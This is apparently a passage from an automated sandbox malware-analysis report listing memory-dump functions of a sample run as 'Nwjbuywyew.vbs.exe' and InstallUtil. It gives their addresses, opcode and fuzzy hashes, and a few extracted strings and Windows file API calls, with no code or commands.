Instruction Fuzzy Hash: EF41A834E102099FEB64BBA4D89476EBBF2FF89315F208539E416DB254CB798C45CB80

Function 06A8226D Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5145282a3452a2216b576cfa7b918cd78c92765fc3c5cb87340bfe84326818f9
Instruction ID: 876358e70b920b0a4a5902585fefb49df7aeb6575a4edb3b5bee34f5809071f6
Opcode Fuzzy Hash: 5145282a3452a2216b576cfa7b918cd78c92765fc3c5cb87340bfe84326818f9
Instruction Fuzzy Hash: 4931A970B002058FEB59AB74D56477EBBA2EB88610F144968D406EB380DF39DE46CBE1

Function 06A82280 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b92f10599f504a9094c4bebbfe7d45fa21e9ec36aefbb497a7f64b51df5acb09
Instruction ID: 0489bf2b60ba731ac6c3f62959ef243c6f47791f4d0d0294a9021cf734d8fee2
Opcode Fuzzy Hash: b92f10599f504a9094c4bebbfe7d45fa21e9ec36aefbb497a7f64b51df5acb09
Instruction Fuzzy Hash: 5C318D30B002058FDB58AB78D564B7FBBA6EB88600B14496CD406DB384DF39DD45CBE1

Function 06A82130 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3714c3446370b82bf616ae5fe2a894ca203dde4dd9c3f6cf4b169604ce744adc
Instruction ID: 5345495a5e332704c976882d0a7f09f1fd8e5702421597a20047658b1e4bfc59
Opcode Fuzzy Hash: 3714c3446370b82bf616ae5fe2a894ca203dde4dd9c3f6cf4b169604ce744adc
Instruction Fuzzy Hash: 21315E75E106059FDB14EF64D8546AEBBB2FF89300F108929E806EB740EB75AD46CB90

Function 06A82140 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ee4a94d1717d6eee3b45950ba967a89e3f901beb469d6ef8dbaeead2375039
Instruction ID: 856b0c32017ea7c64e8ba6ea964dcc2ba5a9a29be2ff2683a778e3fbdf3229f6
Opcode Fuzzy Hash: 52ee4a94d1717d6eee3b45950ba967a89e3f901beb469d6ef8dbaeead2375039
Instruction Fuzzy Hash: 9D314170E102099FCB14DF64D8546AEBBB2FF89300F10C919E916EB350DB75AD45CB90

Function 06A83B40 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff095221fa65290201baa3808f7868ba3b2355f3851d8fbf2f0d67e81776170
Instruction ID: 43b8f27f8f0cd25d43c824a283411ddfaaf60e64f76ffae0e0616f25a0aa095e
Opcode Fuzzy Hash: dff095221fa65290201baa3808f7868ba3b2355f3851d8fbf2f0d67e81776170
Instruction Fuzzy Hash: 522128B5F026149FDF50EFA9D880AAEBBF1EB48B10F148029E905EB241E775DC41CB94

Function 06A83B31 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e1272fa7744d19939566577d181dea745dd23ed727e6336177eef49af7b060
Instruction ID: 3574166994495d4170b2033266d0aed34166da8160f92de6893ec0bf3c198e54
Opcode Fuzzy Hash: 18e1272fa7744d19939566577d181dea745dd23ed727e6336177eef49af7b060
Instruction Fuzzy Hash: C8212BB5F026149FDB40DFA9D980AAE7BF1EB48710F14806AE905EB291E735D8418B94

Function 02EFD110 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1788869133.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2efd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da00677729b00b2958b1be0601375e2730ee44ed6374a8525ca2f4943340893
Instruction ID: b435da9a1e0bec0efc37c7e04713bb15a7454b08f4a6154ebf17372d091c0263
Opcode Fuzzy Hash: 0da00677729b00b2958b1be0601375e2730ee44ed6374a8525ca2f4943340893
Instruction Fuzzy Hash: 9321F275644304DFDB44DF10DDC0B26BF65FB88318F20C5A9EA4A4B256C33AD446CA72

Function 02EFD030 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1788869133.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2efd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761886ee738ffb821b5f985317f73693cf355960b20d0a7f7e9df482ad7a4497
Instruction ID: 443290e58da4e49ffeb4cc3cccdcf0f2165093d057a5632ccedfdad0c3d03ea4
Opcode Fuzzy Hash: 761886ee738ffb821b5f985317f73693cf355960b20d0a7f7e9df482ad7a4497
Instruction Fuzzy Hash: AC21D0B1544344EFDB54DF10D984F26BF66FB84218F20C569EA094B652C33AD847CA62

Function 02EFD005 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1788869133.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2efd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2863d9dc5d5ffa4a6463eb39c4bf8becac24ced9e08e98a7e768954df85db22c
Instruction ID: b724109c90f81ec4535ec993e3b2d0b9888e569825b523747843f4b844bce912
Opcode Fuzzy Hash: 2863d9dc5d5ffa4a6463eb39c4bf8becac24ced9e08e98a7e768954df85db22c
Instruction Fuzzy Hash: 30217C7554D3C08FC703CB20C990711BF71AB46218F29C1EAD9888B6A3C23A984ACB62

Function 06A83C50 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66a90f9e57de60d07de7048e7aace829637d46b6a7326f08f846aac9a421f118
Instruction ID: 61023e4514c820e5ddda17a8e327636c2ad3f37557326bc7c20299532815a738
Opcode Fuzzy Hash: 66a90f9e57de60d07de7048e7aace829637d46b6a7326f08f846aac9a421f118
Instruction Fuzzy Hash: 2A118E75B140284FDF54A6A9DC246AE7BF6EBC8B10F008439D406EB340EF69EC0187A0

Function 06A83E87 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937600ac5f8557fab8a1fa0ea0b34a43123f71f7a84b30d783d1b53f7c05e1c8
Instruction ID: 6852178cabcc4b40a7e2849c383f4185faa2d6aee62544a2becc22df3312bc53
Opcode Fuzzy Hash: 937600ac5f8557fab8a1fa0ea0b34a43123f71f7a84b30d783d1b53f7c05e1c8
Instruction Fuzzy Hash: A601B131B100104BDF20A6ADD81476BABEADBC9B10F508839F50BCB381EE69EC428791

Function 06A83909 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5885650bc0baabef9ca7211fc6244f178c3aaaae349bd6f920886d43da67c491
Instruction ID: 3d295c3b4410a23fc4a2f6371343a5ac69f16d67a0569c558f65f81908700657
Opcode Fuzzy Hash: 5885650bc0baabef9ca7211fc6244f178c3aaaae349bd6f920886d43da67c491
Instruction Fuzzy Hash: 7521D3B1D01259AFCB00DF9AD884BDEFBB4FB48710F10812AE918A7300D374A954CFA5

Function 06A8EE21 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da67fbd3723b850cc9e6973653bae169d5972539a464bb5f569d89e1bcb21e77
Instruction ID: a6acc33d89d444b9f79b0a1a39575dab4c3fd2a61687c90199e690d4fa3465ce
Opcode Fuzzy Hash: da67fbd3723b850cc9e6973653bae169d5972539a464bb5f569d89e1bcb21e77
Instruction Fuzzy Hash: 59018431B20514AFDB75B66DD855B2B6BD6EBCA714F148839E50ACB340DE15DC028381

Function 02EFD10B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1788869133.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2efd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
Instruction ID: e1a402fd1f6ca74212058deb7ada771e03c07c72147580fd86aeabfeeb4bc758
Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
Instruction Fuzzy Hash: CA11DD75544284CFCB05CF10D9C4B15BFB2FB88318F24C6AADD494B656C33AD44ACB61

Function 06A8A38F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b736cd20084b017ec421a8a65f9dfcc98d28155ad7121336e516871f69a838
Instruction ID: 7ea274c319a44368307aa7769391a7059b7091cecf66579b55718c63f6093638
Opcode Fuzzy Hash: c2b736cd20084b017ec421a8a65f9dfcc98d28155ad7121336e516871f69a838
Instruction Fuzzy Hash: B4018F34B205104FDB60AB6DF854B2A7BE5EB8A750F208829E60ACB381DE25EC45C791

Function 06A83910 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad4a0189f251a33bdf9eab459c23f035723f72b90e1e5ac0adb6ccce1bf1d6d
Instruction ID: 4509c74b281773898dd157c7657544bf81f49e384add992e30bd24f611a28255
Opcode Fuzzy Hash: 5ad4a0189f251a33bdf9eab459c23f035723f72b90e1e5ac0adb6ccce1bf1d6d
Instruction Fuzzy Hash: 5011B3B5D01259AFCB10DF9AD884ADEFBB4FB49710F10812AE918A7240C375A954CFA5

Function 06A83E98 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c8447d6ce2d5b5cc29311fb2abedca51e94b81eb0a0a10d74639791abd9c739
Instruction ID: e1af55040c2e13cec11d20ce281f3587262e8b976ed99688a761eb682e0d55a8
Opcode Fuzzy Hash: 5c8447d6ce2d5b5cc29311fb2abedca51e94b81eb0a0a10d74639791abd9c739
Instruction Fuzzy Hash: 6001A231B101104FDF65A6AD980072FA6EACBC9B20F208839F50BCB380DE65DC428391

Function 06A8EE30 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79d9afd6fbb66cdbe779c63fa4819dcf2c9a2564ba9f2c799d43beb6190fec7
Instruction ID: d6c6b0df096ac5b9436a505ee249aba175b4af9f27f0715c76589f35e379008e
Opcode Fuzzy Hash: e79d9afd6fbb66cdbe779c63fa4819dcf2c9a2564ba9f2c799d43beb6190fec7
Instruction Fuzzy Hash: 83013631B205109FDB75A66D985472F67DAEBCA710F148829E50ACB340DE15DC428791

Function 06A83C41 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6684b9c1eeab0b238cc4af56513eab4f1b92bb6dc584ef898b555fa2b4962c44
Instruction ID: 8c722e4c2e0da4b0845fa64d26ad6d448d2961b6b5e51eb64d5f25cbae76afa9
Opcode Fuzzy Hash: 6684b9c1eeab0b238cc4af56513eab4f1b92bb6dc584ef898b555fa2b4962c44
Instruction Fuzzy Hash: 1901DB76B100244BDF54A6ADEC246AF3AA6EBC8B00F00403AD506E7280EF69AC0587A0

Function 06A8A3A0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0538a0b67350df15d0bdf29024d4804fc4c0b4159bf5a51147caf7f2dc6aed35
Instruction ID: ec8ca57996e02af33bb200ac1a7cfa586789404fc92a90172b110bc987e70e43
Opcode Fuzzy Hash: 0538a0b67350df15d0bdf29024d4804fc4c0b4159bf5a51147caf7f2dc6aed35
Instruction Fuzzy Hash: 75018134B205204FDB60E66DE854B2BB7E5EBC9710F20882AE60ACB380DE25EC418781

Function 06A8C870 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1541be92117b017e9450e1c5f83990b861021c058ec0d6c4af266bf667bc116b
Instruction ID: 77e32b38a396d9eeb18efb86ae16ed2e0e1c61569a064788bcf6c7c15d708653
Opcode Fuzzy Hash: 1541be92117b017e9450e1c5f83990b861021c058ec0d6c4af266bf667bc116b
Instruction Fuzzy Hash: 5A018631E112249BDB14AB65E840699B77AF785320F104429E906EB341DB25AC45CB94

Function 06A88350 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7bc78b806f1d8aea68256addae66bc42adb89895d8a30d7cb1f42c6333c89b
Instruction ID: 415ed134a57fa6f59414c869d3b3591502d7d04a07817c8632c0874f638198a5
Opcode Fuzzy Hash: 2f7bc78b806f1d8aea68256addae66bc42adb89895d8a30d7cb1f42c6333c89b
Instruction Fuzzy Hash: FBF0AF32A01201CFDF68BB55E9816BDB775EB84354F904065D805DB241CB3DDD46C791

Function 06A846E1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de16304f0cfb28ac3d44435d3726743927fef0ce551056de843a3f2df97425c4
Instruction ID: 50d507e7dd0461eec5a3c1e0d9e28fa8e05c5fdbd081ad4a65b383a01e92f337
Opcode Fuzzy Hash: de16304f0cfb28ac3d44435d3726743927fef0ce551056de843a3f2df97425c4
Instruction Fuzzy Hash: 0DF0DA34E5021ADFEB54EF94E859BADBBB6FF48701F604119E402A7294CB741C45CB80

Function 06A864F8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1821064832.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6a80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7a4e84733de46a6b52e22e5860f1b592a88d11ce529ab856f2998082f513ee
Instruction ID: 9a30813d13f527517b9825f61aeb3431277d449dced102710036b8ffeee0cb7a
Opcode Fuzzy Hash: 0b7a4e84733de46a6b52e22e5860f1b592a88d11ce529ab856f2998082f513ee
Instruction Fuzzy Hash: EDE02260C583850FEF61BB70CA053193BA4EB02228F2186DBD848CF186D67ACA06CB50

Analysis Process: Nwjbuywyew.vbs.exePID: 5628, Parent PID: 6764COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	98%
Signature Coverage:	0%
Total number of Nodes:	198
Total number of Limit Nodes:	32

Executed Functions

Function 075E1360 Relevance: 2.3, Strings: 1, Instructions: 1098COMMON

Download Yara Rule

Strings

4, xrefs: 075E1D35

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 031ed5bcf9a7f5919b47dffc7991111036c6b384cb755d6e567a458a01dd1a3e
Instruction ID: e721bf273e32b1eb491696be57657d7c73e5a88c0c403097283ac791faa3ca44
Opcode Fuzzy Hash: 031ed5bcf9a7f5919b47dffc7991111036c6b384cb755d6e567a458a01dd1a3e
Instruction Fuzzy Hash: 19B22AB4A00619DFDB18CFA4C894BADB7BABF48700F148199E505AB3A5DB71ED81CF50

Function 07C624D8 Relevance: 2.2, Instructions: 2239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1910865539.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7c60000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93ceec2a1c7b8311ebe55fd610b2ced42774b437aa1cf8a0ee9f02107d68613
Instruction ID: 8ea38e02d847ae0c8e902869abde728891550b15214345eae14e90b6c2172e6a
Opcode Fuzzy Hash: d93ceec2a1c7b8311ebe55fd610b2ced42774b437aa1cf8a0ee9f02107d68613
Instruction Fuzzy Hash: D503E4B0A093859FDB16CBB4DCD9BAE7FB5AF47300F14409AE1409B2E2C7785945CB62

Function 075E1687 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 075E1D35

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 48d9604ee1d940467e88bdef1e846bc970e7f6b57833d4806f4e4323b1a9a884
Instruction ID: 2ae5c45bfa2494abd524a0b7c995ed527bffcbf6a1d52cb2faa61be224302370
Opcode Fuzzy Hash: 48d9604ee1d940467e88bdef1e846bc970e7f6b57833d4806f4e4323b1a9a884
Instruction Fuzzy Hash: 8A222EB4A00619DFDB18CFA4C984BADB7BABF48700F1481A9D509AB3A5DB71DD81CF50

Function 09B9DA70 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1922279912.0000000009B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9b80000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64323b0c146819f1eb513ec1dddc50e4600b0f2cefa8eda128c2c951f30b99fb
Instruction ID: 984e474688311b663bb924a8eeca0cb8613b8bd23f6d54c5c3067c625ebf9c99
Opcode Fuzzy Hash: 64323b0c146819f1eb513ec1dddc50e4600b0f2cefa8eda128c2c951f30b99fb
Instruction Fuzzy Hash: DED1D274A10218CFDB54DFA9D994B9DBBB2FF89300F1081A9E509AB361DB30AD85CF50

Function 0524FA70 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d97959aeb543c567bdb96d33f35eba9109e4d12e52993eeffa5852b46e84cf
Instruction ID: 814658f2cbb469cff56e3becb00a21fe3a1402b71d9fdcc95ab44b22cc8788ea
Opcode Fuzzy Hash: 11d97959aeb543c567bdb96d33f35eba9109e4d12e52993eeffa5852b46e84cf
Instruction Fuzzy Hash: 9E91F834624216DFD728CF44D588FAAB3B2BF84310F158A75D9059B396D3B4E889CF61

Function 075EAA47 Relevance: 10.4, Strings: 8, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l., xrefs: 075EAB36
D3, xrefs: 075EAC96
T1, xrefs: 075EACC7
L2, xrefs: 075EAC78
\0, xrefs: 075EACE5
d/, xrefs: 075EAB18
t-, xrefs: 075EAB54
|,, xrefs: 075EAB72

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: D3$L2$T1$\0$d/$l.$t-$|,
API String ID: 0-1132343184
Opcode ID: c6244b094dae4bea280dab4acde5d4f08c2a284c7380e1c243bd666a60befcc9
Instruction ID: f783161ab89da728dc41e1e489362eb0338b17f7333d6de69c6b18054fddbda9
Opcode Fuzzy Hash: c6244b094dae4bea280dab4acde5d4f08c2a284c7380e1c243bd666a60befcc9
Instruction Fuzzy Hash: 38E1A1F97102129FDB189F38D4506BE7BFABF95200F14886AE592CB3A1DA38C841C761

Function 09740294 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 097403CE

Strings

eU, xrefs: 09740294

Memory Dump Source

Source File: 0000000D.00000002.1920012628.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9740000_Nwjbuywyew.jbxd

Similarity

API ID: CreateFileMapping
String ID: eU
API String ID: 524692379-3903782288
Opcode ID: 321ca510e0f10257d30bbdffe7e28c715eaa450ceed4149d725256fd743aa384
Instruction ID: 0fcd29d5ab14ce1de11a79be15eb6e4c3f55484c9b6182fc0e5560a9b26efa81
Opcode Fuzzy Hash: 321ca510e0f10257d30bbdffe7e28c715eaa450ceed4149d725256fd743aa384
Instruction Fuzzy Hash: 7A51D0B5D003489FDF14CFA9D884BAEBBB1BF0A310F149129E819B7251DB749985CF94

Function 075ECFC8 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l8, xrefs: 075ED1EF
l8, xrefs: 075ED1FB

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: l8$l8
API String ID: 0-2134264951
Opcode ID: 90d227ccda2ef102878413275841a4dd2c625d2eeb38fbe686f8c71d52e190e8
Instruction ID: b6cd60358209dfa16d6c1efac0f8b33460283dc67bc217452cd80a38fd0a07c9
Opcode Fuzzy Hash: 90d227ccda2ef102878413275841a4dd2c625d2eeb38fbe686f8c71d52e190e8
Instruction Fuzzy Hash: 4812F774B00219CFCB18EF64C894A9DB7B6BF89300F5185A9D44AAB365DB30ED86CF51

Function 0977154A Relevance: 2.5, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 0977182C
), xrefs: 09771800

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: )$/
API String ID: 0-2464446594
Opcode ID: 1334d4f62e0a3b953fb7537c36567e3328c3d3fc3e6dcf32bd22efd78b534516
Instruction ID: c2ff360079a3dbfd2f19d47dd340a812051c55f4efb48fc8dd359985139cc19f
Opcode Fuzzy Hash: 1334d4f62e0a3b953fb7537c36567e3328c3d3fc3e6dcf32bd22efd78b534516
Instruction Fuzzy Hash: 7811037580532DCFCB659F28C8897DCBBB0AF0A314F6455E9D509B3281CB704A81CF11

Function 09740040 Relevance: 1.7, APIs: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 09740184

Memory Dump Source

Source File: 0000000D.00000002.1920012628.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9740000_Nwjbuywyew.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1514c7799d64b92e6f422719be4aabf61e78814fc8853369705f27fb3bdbf1eb
Instruction ID: decd1f0b1a4150894070bfe65dece93ef895b1f7091a2c21f7a4b627c249e50f
Opcode Fuzzy Hash: 1514c7799d64b92e6f422719be4aabf61e78814fc8853369705f27fb3bdbf1eb
Instruction Fuzzy Hash: A451DEB5D002589FDF10CFA9D884BDEBBB1BF0A300F20912AE918B7251DB749885DF54

Function 09740298 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 097403CE

Memory Dump Source

Source File: 0000000D.00000002.1920012628.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9740000_Nwjbuywyew.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 60e66b31c99936cd7589084b91561c03ef49ef29c5bf104c3dfa286daae432f2
Instruction ID: 686eee756b3ab9505c6c62c454d66c0feb9f0f0eb3712e51b4989e3a1adebacc
Opcode Fuzzy Hash: 60e66b31c99936cd7589084b91561c03ef49ef29c5bf104c3dfa286daae432f2
Instruction Fuzzy Hash: 8E51DEB5D003089FDF10CFA9D884BAEBBB1BF0A310F14912AE819B7251DB749985CF94

Function 075ED6B0 Relevance: 1.6, Strings: 1, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed
